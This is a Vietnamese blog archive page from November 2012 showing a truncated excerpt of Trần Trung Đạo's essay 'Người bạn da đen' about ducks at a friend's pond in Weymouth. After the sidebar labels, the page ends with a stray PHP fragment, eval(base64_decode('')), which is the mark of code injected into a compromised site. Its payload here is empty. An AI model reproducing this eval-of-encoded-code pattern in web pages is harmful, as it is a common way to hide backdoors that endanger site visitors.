Archive for November 10th, 2012

Trần Trung Đạo: Người bạn da đen

Trần Trung Đạo: Người bạn da đen

Hồ nước sau nhà anh chị Đoàn Đông - Lộc Tưởng ở Weymouth có một bầy vịt. Chúng không phải do anh chị mua về nuôi từ tấm bé mà chỉ vì anh chị săn sóc nên chúng ở lại. Mỗi lần qua thăm tôi thường ngồi trên chiếc ghế bên hồ v

11.10.2012 | Ký-Truyện-Tùy Bút |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>